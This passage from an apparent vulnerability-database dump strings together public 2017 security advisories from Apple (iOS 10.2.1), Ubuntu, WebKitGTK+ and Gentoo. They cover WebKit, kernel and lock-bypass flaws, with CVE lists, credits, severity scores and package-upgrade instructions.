[ 84 ] CVE-2017-2510
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2510
[ 85 ] CVE-2017-2514
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2514
[ 86 ] CVE-2017-2515
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2515
[ 87 ] CVE-2017-2521
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2521
[ 88 ] CVE-2017-2525
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2525
[ 89 ] CVE-2017-2526
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2526
[ 90 ] CVE-2017-2528
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2528
[ 91 ] CVE-2017-2530
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2530
[ 92 ] CVE-2017-2531
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2531
[ 93 ] CVE-2017-2536
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2536
[ 94 ] CVE-2017-2539
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2539
[ 95 ] CVE-2017-2544
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2544
[ 96 ] CVE-2017-2547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2547
[ 97 ] CVE-2017-2549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2549
[ 98 ] CVE-2017-6980
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-6980
[ 99 ] CVE-2017-6984
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-6984
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201706-15
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2017 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
--NcNxMnppmhackEL27c23XhPLDAAQ7GQcq--
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
APPLE-SA-2017-01-23-1 iOS 10.2.1
iOS 10.2.1 is now available and addresses the following:
Auto Unlock
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Auto Unlock may unlock when Apple Watch is off the user's
wrist
Description: A logic issue was addressed through improved state
management.
CVE-2017-2352: Ashley Fernandez of raptAware Pty Ltd
Contacts
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted contact card may lead to
unexpected application termination
Description: An input validation issue existed in the parsing of
contact cards.
CVE-2017-2368: Vincent Desmurs (vincedes3)
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2017-2370: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed through improved
memory management.
CVE-2017-2360: Ian Beer of Google Project Zero
libarchive
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Unpacking a maliciously crafted archive may lead to arbitrary
code execution
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2016-8687: Agostino Sarubbo of Gentoo
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A prototype access issue was addressed through improved
exception handling.
CVE-2017-2354: Neymar of Tencent's Xuanwu Lab (tencent.com) working
with Trend Micro's Zero Day Initiative
CVE-2017-2362: Ivan Fratric of Google Project Zero
CVE-2017-2373: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory initialization issue was addressed through
improved memory handling.
CVE-2017-2356: Team Pangu and lokihardt at PwnFest 2016
CVE-2017-2366: Kai Kang of Tencent's Xuanwu Lab (tencent.com)
CVE-2017-2369: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: Multiple validation issues existed in the handling of
page loading.
CVE-2017-2363: lokihardt of Google Project Zero
CVE-2017-2364: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A malicious website can open popups
Description: An issue existed in the handling of blocking popups.
CVE-2017-2371: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A validation issue existed in variable handling.
CVE-2017-2365: lokihardt of Google Project Zero
WiFi
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An activation-locked device can be manipulated to briefly
present the home screen
Description: An issue existed with handling user input that caused a
device to present the home screen even when activation locked.
CVE-2017-2351: Sriram (@Sri_Hxor) of Primefort Pvt. Ltd., Hemanth
Joseph
Additional recognition
WebKit hardening
We would like to acknowledge Ben Gras, Kaveh Razavi, Erik Bosman,
Herbert Bos, and Cristiano Giuffrida of the vusec group at
Vrije Universiteit Amsterdam for their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About.
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJYgqLhAAoJEIOj74w0bLRGLBMP/2hLYLM6/FsH/npzPbCouZ3a
7WrIax5GAURyvKmeSHYwbZCyDa+U8RoR83xnm25QxVA0SYiqxYQTLavKkdiwL5dL
QJHtbltb3BWF0ctkcN4q9dvA13kapdn7zr1Zp3MyvnqlsIuo5acsl8DwgNapxklP
6NNgLFuUUPDITMRX+CZlndS3ldas9nWBHGUw7FfVQd7+SCj8+u6CBpVm03SPjC4E
9rObbrDg6Ur7RW8sYz5TvfQ+JfL8ZJQgjCNLE99AV5n+y1SzUaW5+WgklmJzwabm
P6VFCFI3qMctmiHDFh5Ab9eFCspL1ppl8gCj2+eqxCdi9cVPdiOxGUJXkfzUvLCq
d68lHHSasRjoVMacMz9ttpR7IAQpM4L9KYgJ/AbwvOFKn5MkxAJYpbU2DDnlg4UY
ZyZ8CqmIfZoEgDFSx4+LcfNeMoB0f0eDClXzCZkLMqyc7ZhRWcDPO7UTXl2l5IN9
1BoOZJ4AB6unI9/JmTz9x1mkfOMatsz3Mlw2aoqfYqhBYH4IMruIoIx9L7VawxY9
IZM1fJhEc1PejgZ48X95suaGm3LHzSqXo9gIcJ42SEevqFaoD96I5S+D1eeBOIe7
yvyQ8APU6W3io9vlfQG7oW+mtHg0uPJY6yLj+79NpvAeVHrFHi1Am+A/4uuEZLjZ
toC5axX5Dn1ZXgiVJb2H
=6bnQ
-----END PGP SIGNATURE-----
.
===========================================================================
Ubuntu Security Notice USN-3200-1
February 16, 2017
webkit2gtk vulnerabilities
===========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.10
- Ubuntu 16.04 LTS
Summary:
Several security issues were fixed in WebKitGTK+.
Software Description:
- webkit2gtk: Web content engine library for GTK+
Details:
A large number of security issues were discovered in the WebKitGTK+ Web and
JavaScript engines.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 16.10:
libjavascriptcoregtk-4.0-18 2.14.5-0ubuntu0.16.10.1
libwebkit2gtk-4.0-37 2.14.5-0ubuntu0.16.10.1
Ubuntu 16.04 LTS:
libjavascriptcoregtk-4.0-18 2.14.5-0ubuntu0.16.04.1
libwebkit2gtk-4.0-37 2.14.5-0ubuntu0.16.04.1
This update uses a new upstream release, which includes additional bug
fixes. After a standard system update you need to restart any applications
that use WebKitGTK+, such as Epiphany, to make all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-3200-1
CVE-2017-2350, CVE-2017-2354, CVE-2017-2355, CVE-2017-2356,
CVE-2017-2362, CVE-2017-2363, CVE-2017-2364, CVE-2017-2365,
CVE-2017-2366, CVE-2017-2369, CVE-2017-2371, CVE-2017-2373
Package Information:
https://launchpad.net/ubuntu/+source/webkit2gtk/2.14.5-0ubuntu0.16.10.1
https://launchpad.net/ubuntu/+source/webkit2gtk/2.14.5-0ubuntu0.16.04.1
| VAR-201702-0866 | CVE-2017-2352 | Apple iOS and watchOS of "iPhone Unlock by " Vulnerability that bypasses wrist-worn protection mechanisms in components |
CVSS V2: 2.1 CVSS V3: 4.6 Severity: MEDIUM |
An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. watchOS before 3.1.3 is affected. The issue involves the "Unlock with iPhone" component, which allows attackers to bypass the wrist-presence protection mechanism and unlock a Watch device via unspecified vectors. Apple iOS and watchOS are prone to a security bypass vulnerability.
Attackers can exploit this issue to bypass security restrictions and perform unauthorized actions. Apple iOS is an operating system developed for mobile devices; Apple watchOS is an operating system for smart watches. Unlock with iPhone is one of the automatic unlock components. An attacker could exploit this vulnerability to unlock the watch. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
APPLE-SA-2017-01-23-1 iOS 10.2.1
iOS 10.2.1 is now available and addresses the following:
Auto Unlock
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Auto Unlock may unlock when Apple Watch is off the user's
wrist
Description: A logic issue was addressed through improved state
management.
CVE-2017-2352: Ashley Fernandez of raptAware Pty Ltd
Contacts
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted contact card may lead to
unexpected application termination
Description: An input validation issue existed in the parsing of
contact cards. This issue was addressed through improved input
validation.
CVE-2017-2368: Vincent Desmurs (vincedes3)
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2017-2370: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed through improved
memory management.
CVE-2017-2360: Ian Beer of Google Project Zero
libarchive
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Unpacking a maliciously crafted archive may lead to arbitrary
code execution
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2016-8687: Agostino Sarubbo of Gentoo
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A prototype access issue was addressed through improved
exception handling.
CVE-2017-2350: Gareth Heyes of Portswigger Web Security
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed through
improved memory handling.
CVE-2017-2354: Neymar of Tencent's Xuanwu Lab (tencent.com) working
with Trend Micro's Zero Day Initiative
CVE-2017-2362: Ivan Fratric of Google Project Zero
CVE-2017-2373: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory initialization issue was addressed through
improved memory handling.
CVE-2017-2355: Team Pangu and lokihardt at PwnFest 2016
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed through
improved input validation.
CVE-2017-2356: Team Pangu and lokihardt at PwnFest 2016
CVE-2017-2366: Kai Kang of Tencent's Xuanwu Lab (tencent.com)
CVE-2017-2369: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: Multiple validation issues existed in the handling of
page loading. This issue was addressed through improved logic.
CVE-2017-2363: lokihardt of Google Project Zero
CVE-2017-2364: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A malicious website can open popups
Description: An issue existed in the handling of blocking popups.
This was addressed through improved input validation.
CVE-2017-2371: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A validation issue existed in variable handling. This
issue was addressed through improved validation.
CVE-2017-2365: lokihardt of Google Project Zero
WiFi
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An activation-locked device can be manipulated to briefly
present the home screen
Description: An issue existed with handling user input that caused a
device to present the home screen even when activation locked. This
was addressed through improved input validation.
CVE-2017-2351: Sriram (@Sri_Hxor) of Primefort Pvt. Ltd., Hemanth
Joseph
Additional recognition
WebKit hardening
We would like to acknowledge Ben Gras, Kaveh Razavi, Erik Bosman,
Herbert Bos, and Cristiano Giuffrida of the vusec group at
Vrije Universiteit Amsterdam for their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "10.2.1".
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJYgqLhAAoJEIOj74w0bLRGLBMP/2hLYLM6/FsH/npzPbCouZ3a
7WrIax5GAURyvKmeSHYwbZCyDa+U8RoR83xnm25QxVA0SYiqxYQTLavKkdiwL5dL
QJHtbltb3BWF0ctkcN4q9dvA13kapdn7zr1Zp3MyvnqlsIuo5acsl8DwgNapxklP
6NNgLFuUUPDITMRX+CZlndS3ldas9nWBHGUw7FfVQd7+SCj8+u6CBpVm03SPjC4E
9rObbrDg6Ur7RW8sYz5TvfQ+JfL8ZJQgjCNLE99AV5n+y1SzUaW5+WgklmJzwabm
P6VFCFI3qMctmiHDFh5Ab9eFCspL1ppl8gCj2+eqxCdi9cVPdiOxGUJXkfzUvLCq
d68lHHSasRjoVMacMz9ttpR7IAQpM4L9KYgJ/AbwvOFKn5MkxAJYpbU2DDnlg4UY
ZyZ8CqmIfZoEgDFSx4+LcfNeMoB0f0eDClXzCZkLMqyc7ZhRWcDPO7UTXl2l5IN9
1BoOZJ4AB6unI9/JmTz9x1mkfOMatsz3Mlw2aoqfYqhBYH4IMruIoIx9L7VawxY9
IZM1fJhEc1PejgZ48X95suaGm3LHzSqXo9gIcJ42SEevqFaoD96I5S+D1eeBOIe7
yvyQ8APU6W3io9vlfQG7oW+mtHg0uPJY6yLj+79NpvAeVHrFHi1Am+A/4uuEZLjZ
toC5axX5Dn1ZXgiVJb2H
=6bnQ
-----END PGP SIGNATURE-----
| VAR-201702-0865 | CVE-2017-2351 | Apple iOS of WiFi Vulnerabilities that bypass activation lock protection mechanisms in components |
CVSS V2: 2.1 CVSS V3: 2.4 Severity: LOW |
An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. The issue involves the "WiFi" component, which allows physically proximate attackers to bypass the activation-lock protection mechanism and view the home screen via unspecified vectors. Apple iOS is prone to a denial-of-service vulnerability and a security-bypass vulnerability.
An attacker can exploit this issue to bypass security restrictions and perform unauthorized actions or cause a denial-of-service condition. This may aid in further attacks. Apple iOS is an operating system developed by Apple (Apple) for mobile devices. WiFi is one of the wireless connectivity components. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
APPLE-SA-2017-01-23-1 iOS 10.2.1
iOS 10.2.1 is now available and addresses the following:
Auto Unlock
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Auto Unlock may unlock when Apple Watch is off the user's
wrist
Description: A logic issue was addressed through improved state
management.
CVE-2017-2352: Ashley Fernandez of raptAware Pty Ltd
Contacts
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted contact card may lead to
unexpected application termination
Description: An input validation issue existed in the parsing of
contact cards. This issue was addressed through improved input
validation.
CVE-2017-2368: Vincent Desmurs (vincedes3)
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2017-2370: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed through improved
memory management.
CVE-2017-2360: Ian Beer of Google Project Zero
libarchive
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Unpacking a maliciously crafted archive may lead to arbitrary
code execution
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2016-8687: Agostino Sarubbo of Gentoo
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A prototype access issue was addressed through improved
exception handling.
CVE-2017-2350: Gareth Heyes of Portswigger Web Security
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed through
improved memory handling.
CVE-2017-2354: Neymar of Tencent's Xuanwu Lab (tencent.com) working
with Trend Micro's Zero Day Initiative
CVE-2017-2362: Ivan Fratric of Google Project Zero
CVE-2017-2373: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory initialization issue was addressed through
improved memory handling.
CVE-2017-2355: Team Pangu and lokihardt at PwnFest 2016
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed through
improved input validation.
CVE-2017-2356: Team Pangu and lokihardt at PwnFest 2016
CVE-2017-2366: Kai Kang of Tencent's Xuanwu Lab (tencent.com)
CVE-2017-2369: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: Multiple validation issues existed in the handling of
page loading. This issue was addressed through improved logic.
CVE-2017-2363: lokihardt of Google Project Zero
CVE-2017-2364: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A malicious website can open popups
Description: An issue existed in the handling of blocking popups.
This was addressed through improved input validation.
CVE-2017-2371: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A validation issue existed in variable handling. This
issue was addressed through improved validation.
CVE-2017-2365: lokihardt of Google Project Zero
WiFi
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An activation-locked device can be manipulated to briefly
present the home screen
Description: An issue existed with handling user input that caused a
device to present the home screen even when activation locked. This
was addressed through improved input validation.
CVE-2017-2351: Sriram (@Sri_Hxor) of Primefort Pvt. Ltd., Hemanth
Joseph
Additional recognition
WebKit hardening
We would like to acknowledge Ben Gras, Kaveh Razavi, Erik Bosman,
Herbert Bos, and Cristiano Giuffrida of the vusec group at
Vrije Universiteit Amsterdam for their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "10.2.1".
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJYgqLhAAoJEIOj74w0bLRGLBMP/2hLYLM6/FsH/npzPbCouZ3a
7WrIax5GAURyvKmeSHYwbZCyDa+U8RoR83xnm25QxVA0SYiqxYQTLavKkdiwL5dL
QJHtbltb3BWF0ctkcN4q9dvA13kapdn7zr1Zp3MyvnqlsIuo5acsl8DwgNapxklP
6NNgLFuUUPDITMRX+CZlndS3ldas9nWBHGUw7FfVQd7+SCj8+u6CBpVm03SPjC4E
9rObbrDg6Ur7RW8sYz5TvfQ+JfL8ZJQgjCNLE99AV5n+y1SzUaW5+WgklmJzwabm
P6VFCFI3qMctmiHDFh5Ab9eFCspL1ppl8gCj2+eqxCdi9cVPdiOxGUJXkfzUvLCq
d68lHHSasRjoVMacMz9ttpR7IAQpM4L9KYgJ/AbwvOFKn5MkxAJYpbU2DDnlg4UY
ZyZ8CqmIfZoEgDFSx4+LcfNeMoB0f0eDClXzCZkLMqyc7ZhRWcDPO7UTXl2l5IN9
1BoOZJ4AB6unI9/JmTz9x1mkfOMatsz3Mlw2aoqfYqhBYH4IMruIoIx9L7VawxY9
IZM1fJhEc1PejgZ48X95suaGm3LHzSqXo9gIcJ42SEevqFaoD96I5S+D1eeBOIe7
yvyQ8APU6W3io9vlfQG7oW+mtHg0uPJY6yLj+79NpvAeVHrFHi1Am+A/4uuEZLjZ
toC5axX5Dn1ZXgiVJb2H
=6bnQ
-----END PGP SIGNATURE-----
| VAR-201702-0886 | CVE-2017-2373 | plural Apple Used in products WebKit Vulnerable to arbitrary code execution |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. Safari before 10.0.3 is affected. tvOS before 10.1.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. Apple iOS , Safari and tvOS Used in etc. WebKit is prone to multiple security vulnerabilities.
Attackers can exploit these issues to obtain sensitive information or execute arbitrary code and perform unauthorized actions; this may aid in launching further attacks. in the United States. Apple iOS is an operating system developed for mobile devices; Apple Safari is a web browser that is the default browser included with the Mac OS X and iOS operating systems. WebKit is a set of open source web browser engines jointly developed by companies such as KDE, Apple (Apple), and Google (Google), and is currently used by browsers such as Apple Safari and Google Chrome. The following products and versions are affected: Apple iOS prior to 10.2.1; Safari prior to 10.0.3; tvOS prior to 10.1.1.
Safari 10.0.3 may be obtained from the Mac App Store. ------------------------------------------------------------------------
WebKitGTK+ Security Advisory WSA-2017-0002
------------------------------------------------------------------------
Date reported : February 10, 2017
Advisory ID : WSA-2017-0002
Advisory URL : https://webkitgtk.org/security/WSA-2017-0002.html
CVE identifiers : CVE-2017-2350, CVE-2017-2354, CVE-2017-2355,
CVE-2017-2356, CVE-2017-2362, CVE-2017-2363,
CVE-2017-2364, CVE-2017-2365, CVE-2017-2366,
CVE-2017-2369, CVE-2017-2371, CVE-2017-2373.
Several vulnerabilities were discovered in WebKitGTK+.
Credit to Gareth Heyes of Portswigger Web Security.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: A prototype access issue was
addressed through improved exception handling.
Credit to Neymar of Tencent's Xuanwu Lab (tencent.com) working with
Trend Micro's Zero Day Initiative. Description: Multiple memory corruption
issues were addressed through improved memory handling.
Credit to Team Pangu and lokihardt at PwnFest 2016. Description: A memory initialization issue
was addressed through improved memory handling.
Credit to Team Pangu and lokihardt at PwnFest 2016. Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed through improved memory handling.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: Multiple validation issues existed
in the handling of page loading. This issue was addressed through
improved logic.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: Multiple validation issues existed
in the handling of page loading. This issue was addressed through
improved logic.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: A validation issue existed in
variable handling. This issue was addressed through improved
validation.
Credit to Kai Kang of Tencent's Xuanwu Lab (tencent.com). Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to lokihardt of Google Project Zero.
Impact: A malicious website can open popups. Description: An issue
existed in the handling of blocking popups. This was addressed
through improved input validation.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed through improved memory handling.
We recommend updating to the last stable version of WebKitGTK+. It is
the best way of ensuring that you are running a safe version of
WebKitGTK+. Please check our website for information about the last
stable releases.
Further information about WebKitGTK+ Security Advisories can be found
at: https://webkitgtk.org/security.html
The WebKitGTK+ team,
February 10, 2017
.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201706-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: WebKitGTK+: Multiple vulnerabilities
Date: June 07, 2017
Bugs: #543650, #573656, #577068, #608958, #614876, #619788
ID: 201706-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in WebKitGTK+, the worst of
which allows remote attackers to execute arbitrary code.
Background
==========
WebKitGTK+ is a full-featured port of the WebKit rendering engine.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-libs/webkit-gtk < 2.16.3 >= 2.16.3
Description
===========
Multiple vulnerabilities have been discovered in WebKitGTK+. Please
review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All WebKitGTK+ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.16.3:4"
References
==========
[ 1 ] CVE-2015-2330
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2330
[ 2 ] CVE-2015-7096
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7096
[ 3 ] CVE-2015-7098
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7098
[ 4 ] CVE-2016-1723
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1723
[ 5 ] CVE-2016-1724
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1724
[ 6 ] CVE-2016-1725
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1725
[ 7 ] CVE-2016-1726
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1726
[ 8 ] CVE-2016-1727
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1727
[ 9 ] CVE-2016-1728
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1728
[ 10 ] CVE-2016-4692
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4692
[ 11 ] CVE-2016-4743
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4743
[ 12 ] CVE-2016-7586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7586
[ 13 ] CVE-2016-7587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7587
[ 14 ] CVE-2016-7589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7589
[ 15 ] CVE-2016-7592
